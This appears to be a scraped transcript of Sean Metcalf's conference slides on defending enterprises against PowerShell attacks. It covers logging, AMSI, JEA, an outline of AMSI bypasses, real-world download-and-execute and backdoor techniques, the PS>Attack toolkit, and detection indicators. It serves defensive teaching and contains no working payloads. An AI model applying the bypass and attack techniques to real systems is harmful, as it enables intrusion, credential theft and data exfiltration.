PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security:...
Transcript of PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security:...
![Page 1: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/1.jpg)
PowerShell Security:Defending the Enterprise from the
Latest Attack Platform
Sean Metcalf (@Pyrotek3)
s e a n [@] TrimarcSecurity.comwww.ADSecurity.orgTrimarcSecurity.com
Sean Metcalf (@Pyrotek3)
![Page 2: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/2.jpg)
ABOUT
Founder Trimarc, a security company.
Microsoft Certified Master (MCM) Directory Services
Microsoft MVP
Speaker: BSides, Shakacon, Black Hat, DEF CON, DerbyCon
Security Consultant / Security Researcher
Own & Operate ADSecurity.org(Microsoft platform security info)
+ Sean Metcalf (@Pyrotek3)
![Page 3: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/3.jpg)
Sean Metcalf (@Pyrotek3)
![Page 4: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/4.jpg)
AGENDA
PowerShell Overview & Capability
PowerShell as an Attack Platform
Real World PowerShell Attack Code
Bypassing PowerShell Security & Mitigation
Defense Summary
Sean Metcalf (@Pyrotek3)
Detecting Offensive PowerShell Attack Toolshttps://adsecurity.org/?p=2604Slides: Presentations.ADSecurity.org
![Page 5: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/5.jpg)
“Isn't PowerShell just C# with training wheels?”
Sean Metcalf (@Pyrotek3)
![Page 6: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/6.jpg)
PowerShell Overview
• Object-based scripting language leveraging .Nettechnologies.
• Primarily designed in C#.
• “BASH shell for Windows”
• PowerShell can call .Netdirectly: [System.DirectoryServices
.ActiveDirectory.Forest]:
:GetCurrentForest()
• Extensible through imported code modules which add new commands.
• Simplifies data access to standard resources (WMI, XML, registry, event logs, etc).
• PowerShell.exe (CLI) or PowerShell_ISE.exe (ISE GUI).
• 10 years old!(almost)
Sean Metcalf (@Pyrotek3)
![Page 7: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/7.jpg)
PowerShell v5 Security Enhancements
• Script block logging
• System-wide transcripts
•Constrained PowerShell enforced when application whitelisting enabled (AppLocker/Device Guard)
•Antimalware Integration (Win 10)http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
Windows Management Framework (WMF) version 5 available for download:https://www.microsoft.com/en-us/download/details.aspx?id=50395
Sean Metcalf (@Pyrotek3)
![Page 8: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/8.jpg)
PowerShell Group Policy
Sean Metcalf (@Pyrotek3)
![Page 9: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/9.jpg)
Sean Metcalf (@Pyrotek3)
![Page 10: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/10.jpg)
PowerShell v5 Security: Script Block Logging
Sean Metcalf (@Pyrotek3)
![Page 11: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/11.jpg)
Sean Metcalf (@Pyrotek3)
![Page 12: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/12.jpg)
PowerShell v5 Security: System-Wide Transcripts
Sean Metcalf (@Pyrotek3)
![Page 13: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/13.jpg)
Sean Metcalf (@Pyrotek3)
![Page 14: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/14.jpg)
PowerShell v5: Constrained PowerShell Enforced (WL)
Sean Metcalf (@Pyrotek3)
![Page 15: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/15.jpg)
Sean Metcalf (@Pyrotek3)
![Page 16: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/16.jpg)
Windows 10 PS Security: Antimalware Integration
Sean Metcalf (@Pyrotek3)
![Page 17: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/17.jpg)
Windows 10: AntiMalware Scan Interface (AMSI)
Sean Metcalf (@Pyrotek3)
![Page 18: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/18.jpg)
Sean Metcalf (@Pyrotek3)
![Page 19: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/19.jpg)
Sean Metcalf (@Pyrotek3)
![Page 20: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/20.jpg)
Bypassing Windows 10 AMSI
• Sometimes, PowerShell code gets through.
•DLL hijacking: http://cn33liz.blogspot.nl/2016/05/bypassing-amsi-using-powershell-5-dll.html
•Use Reflection:
Sean Metcalf (@Pyrotek3)
![Page 21: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/21.jpg)
Sean Metcalf (@Pyrotek3)
![Page 22: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/22.jpg)
Security Vendors Supporting Win10 AMSI
1. Microsoft Defender: Now
2. AVG: Now (AVG Protection 2016.7496)
3. ESET: Version 10 Beta
4. Avast: “Avast will be implementing AMSI in the near future.” (7/2015)
5. Trend Micro: ??
6. Symantec: ???
7. McAfee: ???
8. Sophos: ??
9. Kaspersky: ??
10.BitDefender: ??
11. F-Secure : ??
12. Avira : ??
13. Panda : ??
Sean Metcalf (@Pyrotek3)
![Page 23: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/23.jpg)
Sean Metcalf (@Pyrotek3)
![Page 24: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/24.jpg)
Just Enough Administration (JEA)PowerShell v5, Windows 10, Windows Server 2016
aka.ms/jeahttps://msdn.microsoft.com/powershell/jea/readme
Sean Metcalf (@Pyrotek3)
![Page 25: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/25.jpg)
JEA Overview
•Constrained PowerShell remoting session with whitelisted cmdlets with select parameter options.
•Baked into Windows 10/2016, otherwise deploy PSv5.
•Delegating server rights can leverage a “virtual account” (Win8.1 & 2012R2+).
•Gain insight through PS logging/transcription.
• Ideal for server admin delegation & Active Directory tasks.
Sean Metcalf (@Pyrotek3)
![Page 26: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/26.jpg)
JEA Configuration
•Prerequisites (domain-joined, PS Remoting, etc).• Identify tasks & restrict as appropriate.•Confirm they work with JEA.•Configure tasks in a Role Capability file (PSRC).•Register a Session Configuration that exposes Role
Capability.• Follow principle of least privilege.• Test. You can accidentally expose access so review
Role Capability exposure.
Sean Metcalf (@Pyrotek3)
![Page 27: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/27.jpg)
PowerShell as an Attack Platform
Sean Metcalf (@Pyrotek3)
![Page 28: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/28.jpg)
Attackers Have Options
•Custom executables (EXEs)
•Windows command tools
•Remote Desktop
•Sysinternal tools
•Windows Scripting Host
•VBScript
•CScript
• JavaScript
•Batch files
•PowerShell
Sean Metcalf (@Pyrotek3)
![Page 29: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/29.jpg)
Quick PowerShell Attack History• Summer 2010 - DEF CON 18: Dave Kennedy & Josh Kelly
“PowerShell OMFG!” https://www.youtube.com/watch?v=JKlVONfD53w
• Describes many of the PowerShell attack techniques used today (Bypass exec policy, -Enc, & IE).
• Released PowerDump to dump SAM database via PowerShell.
•2012 – PowerSploit, a GitHub repo started by Matt Graeber, launched with Invoke-Shellcode.• “Inject shellcode into the process ID of your choosing or within the
context of the running PowerShell process.”
• 2013 - Invoke-Mimkatz released by Joe Bialek which leverages Invoke-ReflectivePEInjection.
Sean Metcalf (@Pyrotek3)
![Page 30: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/30.jpg)
Benefits of PowerShell as an Attack Platform
•Run code in memory without touching disk.•Download & execute code from another system.• Interface with .Net & Windows APIs.•Built-in remoting.•CMD.exe is commonly blocked, though not PowerShell.•Most organizations are not watching PowerShell activity.•Many endpoint security products don’t have visibility
into PowerShell activity.
Sean Metcalf (@Pyrotek3)
![Page 31: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/31.jpg)
Real-world PowerShell attacksSean Metcalf (@Pyrotek3)
![Page 32: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/32.jpg)
Sean Metcalf (@Pyrotek3)
Word Macro -> PowerShell -> Download & Execute Payload
![Page 33: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/33.jpg)
Sean Metcalf (@Pyrotek3) http://pastebin.com/7wYupkJL
Download Code & Upload Recon Data
![Page 34: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/34.jpg)
Sean Metcalf (@Pyrotek3)
http://pastebin.com/juC4CkQG
Download Code & Execute
![Page 35: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/35.jpg)
Sean Metcalf (@Pyrotek3)
http://pastebin.com/juC4CkQG
Download JPG file as EXE, then Execute
![Page 36: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/36.jpg)
Sean Metcalf (@Pyrotek3) http://pastebin.com/juC4CkQG
Create “Update_Google” task to execute Shellcode
![Page 37: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/37.jpg)
Sean Metcalf (@Pyrotek3) http://pastebin.com/7wYupkJLFind Financial & Sensitive Browser Windows
![Page 38: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/38.jpg)
Sean Metcalf (@Pyrotek3)
Take Screenshots with PowerShell
![Page 39: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/39.jpg)
Sean Metcalf (@Pyrotek3)
WMI Backdoor
https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
![Page 40: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/40.jpg)
Sean Metcalf (@Pyrotek3)
Jeffrey Snover & Lee Holmes - DerbyCon 2016 Keynote
![Page 41: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/41.jpg)
PowerShell without PowerShell.exeSean Metcalf (@Pyrotek3)
![Page 42: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/42.jpg)
Run PowerShell from .Net
•PowerShell = System.Management.Automation.dll
•Applications can run PowerShell code
• “PowerShell ps = PowerShell.Create()”
•Ben Ten’s “Not PowerShellhttps://github.com/Ben0xA/nps
Sean Metcalf (@Pyrotek3)
![Page 43: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/43.jpg)
Custom “PowerShell” C# App
• Create C# application that references PowershellSystem.Automation.dll assembly.
• Leverage Automation assembly’s functions to execute PowerShell Code.
• Similar to how PowerShell.exe works.
• Unmanaged PowerShell by Lee Christensenhttps://github.com/leechristensen/UnmanagedPowerShell
• Foundation for most PowerShell attack tools running outside of powershell.exe.
• Starts up .NET & performs in-memory loading of a custom C# assembly that executes PowerShell.
• Executes PowerShell from an unmanaged process.Sean Metcalf (@Pyrotek3)
![Page 44: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/44.jpg)
Metasploit PowerShell Module
Sean Metcalf (@Pyrotek3)
![Page 45: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/45.jpg)
Side-Stepping PowerShell SecuritySean Metcalf (@Pyrotek3)
![Page 46: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/46.jpg)
PowerShell Attack Platform: PS>Attack•Description• Self contained custom PowerShell console which includes
many offensive PowerShell tools. • Calls PowerShell through .Net• Modules are encrypted (AV evasion) and decrypted to
memory• Custom Build Tool
•Use • Recon, Credential Theft, Privilege Escalation, Data Exfiltration
•Author • Jared Haight (@jaredhaight)
https://github.com/jaredhaight/psattackSean Metcalf (@Pyrotek3)
![Page 47: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/47.jpg)
Sean Metcalf (@Pyrotek3)
![Page 48: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/48.jpg)
Sean Metcalf (@Pyrotek3)
![Page 49: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/49.jpg)
Sean Metcalf (@Pyrotek3)
![Page 50: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/50.jpg)
PS Constrained Language Mode?
Sean Metcalf (@Pyrotek3)
![Page 51: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/51.jpg)
PowerShell v5 Security Log Data?
Sean Metcalf (@Pyrotek3)
![Page 52: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/52.jpg)
Sean Metcalf (@Pyrotek3)
![Page 53: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/53.jpg)
Sean Metcalf (@Pyrotek3)
![Page 54: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/54.jpg)
Detecting/Mitigating PS>AttackAnd other Applications (EXEs) hosting PowerShell
Sean Metcalf (@Pyrotek3)
![Page 55: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/55.jpg)
Sean Metcalf (@Pyrotek3)
![Page 56: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/56.jpg)
Detecting/Mitigating PS>Attack
•Discover PowerShell in non-standard processes.
•Get-Process modules like “*Management.Automation*”
Sean Metcalf (@Pyrotek3)
![Page 57: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/57.jpg)
Sean Metcalf (@Pyrotek3)
![Page 58: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/58.jpg)
Detecting/Mitigating PS>Attack•Run Windows 10 with AMSI aware AV
Sean Metcalf (@Pyrotek3)
![Page 59: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/59.jpg)
Sean Metcalf (@Pyrotek3)
PS>Attack, now with more AMSI Bypass!
![Page 60: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/60.jpg)
Detecting/Mitigating PS>Attack
Sean Metcalf (@Pyrotek3)
![Page 61: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/61.jpg)
Remove PowerShell v2 from Windows 10
Sean Metcalf (@Pyrotek3)
![Page 62: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/62.jpg)
Detecting/Mitigating PS>Attack (Windows 10)
Sean Metcalf (@Pyrotek3)
![Page 63: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/63.jpg)
Sean Metcalf (@Pyrotek3)
![Page 64: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/64.jpg)
Sean Metcalf (@Pyrotek3)
![Page 65: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/65.jpg)
Sean Metcalf (@Pyrotek3)
![Page 66: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/66.jpg)
Detecting Custom EXEs Hosting PowerShell
• Event 800: HostApplication not standard Microsoft tool (PowerShell , PowerShell ISE, etc).
• Event 800: Version mismatch between HostVersion & EngineVersion (problematic).
• System.Management.Automation.(ni.)dll hosted in non-standard processes.
•Remember that custom EXEs can natively call .Net & Windows APIs directly without PowerShell.
Sean Metcalf (@Pyrotek3)
![Page 67: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/67.jpg)
PowerShell Logging & Attack DetectionSean Metcalf (@Pyrotek3)
![Page 68: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/68.jpg)
PowerShell Module Logging
•PowerShell version 3+
•Enable via Group Policy:•Computer Configuration\Policies\Administrative
Template\Windows Components\Windows PowerShell.
•Logging enhanced in PowerShell v4.
•PowerShell v5 has compelling logging features.
Sean Metcalf (@Pyrotek3)
![Page 69: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/69.jpg)
PowerShell Module Logging - All
Sean Metcalf (@Pyrotek3)
